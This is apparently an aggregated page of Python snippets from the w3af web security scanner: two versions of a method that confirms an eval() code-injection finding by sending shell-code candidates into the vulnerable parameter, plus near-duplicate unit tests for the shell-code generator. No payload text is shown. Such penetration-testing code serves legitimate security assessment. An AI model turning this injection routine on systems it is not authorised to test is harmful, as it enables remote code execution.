Example #1
    def _verify_vuln(self, vuln_obj):
        '''
        Confirm that the reported finding can actually be exploited.

        Each candidate snippet that shell_handler returns for the URL's
        extension is written into the entry keyed by vuln_obj.getVar() and
        sent through the opener method named by vuln_obj.getMethod(). The
        search stops at the first response for which _define_exact_cut()
        gives a truthy result; that snippet is kept in self._shell_code.

        @parameter vuln_obj: The vulnerability to confirm.
        @return : True as soon as one snippet is confirmed, False when none is.
        '''
        file_ext = vuln_obj.getURL().getExtension()

        # get_shell_code() yields (snippet, extension) pairs; only the snippet
        # is used in this method.
        for payload, _unused_ext in shell_handler.get_shell_code(file_ext):
            send = getattr(self._urlOpener, vuln_obj.getMethod())
            params = vuln_obj.getDc()
            # NOTE(review): if getDc() hands back the finding's own container
            # rather than a copy, this write stays on vuln_obj after the
            # method returns -- confirm.
            params[vuln_obj.getVar()] = payload

            try:
                response = send(vuln_obj.getURL(), str(params))
            except Exception:
                # NOTE(review): every failure is discarded without a trace, so
                # a network error and a programming error look the same to the
                # operator; consider logging before moving on.
                continue

            if self._define_exact_cut(response.getBody(),
                                      shell_handler.SHELL_IDENTIFIER):
                self._shell_code = payload
                return True

        # None of the candidates was confirmed.
        return False
Example #2
File: eval.py Project: weisst/w3af
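    def _verify_vuln(self, vuln_obj):
        '''
        Confirm that the reported eval() finding can actually be exploited.

        Each candidate snippet that shell_handler returns for the URL's
        extension is written into the entry keyed by vuln_obj.get_var() and
        sent through the opener method named by vuln_obj.get_method(). The
        first response whose body contains shell_handler.SHELL_IDENTIFIER
        ends the search and the snippet is kept in self._shell_code.

        :param vuln_obj: The vulnerability to confirm.
        :return: True as soon as one snippet is confirmed, False when none is.
        '''
        extension = vuln_obj.get_url().get_extension()
        # A list of (code, extension) tuples; only the code is used here.
        shell_code_list = shell_handler.get_shell_code(extension)

        for code, _real_extension in shell_code_list:
            function_reference = getattr(self._uri_opener,
                                         vuln_obj.get_method())
            data_container = vuln_obj.get_dc()
            # NOTE(review): if get_dc() hands back the finding's own container
            # rather than a copy, this write stays on vuln_obj after the
            # method returns -- confirm.
            data_container[vuln_obj.get_var()] = code

            try:
                http_res = function_reference(vuln_obj.get_url(),
                                              str(data_container))
            except w3afException as w3:
                # A failed request is logged and the next snippet is tried.
                msg = ('An error ocurred while trying to exploit the eval()'
                       ' vulnerability. Original exception: "%s".')
                om.out.debug(msg % w3)
            else:
                if shell_handler.SHELL_IDENTIFIER in http_res.get_body():
                    # Only the first 35 characters of the snippet are logged.
                    msg = ('Sucessfully exploited eval() vulnerability using'
                           ' the following code snippet: "%s...".' % code[:35])
                    om.out.debug(msg)
                    self._shell_code = code
                    return True

        # No snippet was confirmed: return an explicit False instead of
        # falling off the end with None, as the docstring promises a boolean.
        return False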
Example #3
    def test_get_shell_code_invalid_extension(self):
        # '123456' stands in for an invalid extension (per the test name);
        # the call must still return exactly one candidate.
        candidates = get_shell_code('123456')
        self.assertEqual(len(candidates), 1)

        # That candidate is a (code, language) pair tagged as PHP whose code
        # contains an echo statement.
        first_entry = candidates[0]
        snippet, language = first_entry
        self.assertEqual(language, 'php')
        self.assertIn('echo ', snippet)
Example #4
    def test_get_shell_code_extension_force(self):
        # The second positional argument is True -- the "force" flag, going
        # by the test name; its exact meaning lives in shell_handler.
        candidates = get_shell_code('php', True)
        self.assertEqual(len(candidates), 1)

        # The only candidate returned must be the PHP one.
        first_entry = candidates[0]
        snippet, language = first_entry
        self.assertEqual(language, 'php')
        self.assertIn('echo ', snippet)
Example #5
    def test_get_shell_code_invalid_extension(self):
        # "123456" stands in for an invalid extension (per the test name);
        # the call must still return exactly one candidate.
        returned = get_shell_code("123456")
        self.assertEqual(len(returned), 1)

        # The lone entry unpacks into (code, language) and is tagged as PHP.
        only_entry = returned[0]
        code_text, language = only_entry
        self.assertEqual(language, "php")
        self.assertIn("echo ", code_text)
Example #6
    def test_get_shell_code_extension_force(self):
        # The second positional argument is True -- the "force" flag, going
        # by the test name; its exact meaning lives in shell_handler.
        returned = get_shell_code("php", True)
        self.assertEqual(len(returned), 1)

        # The lone entry unpacks into (code, language) and is tagged as PHP.
        only_entry = returned[0]
        code_text, language = only_entry
        self.assertEqual(language, "php")
        self.assertIn("echo ", code_text)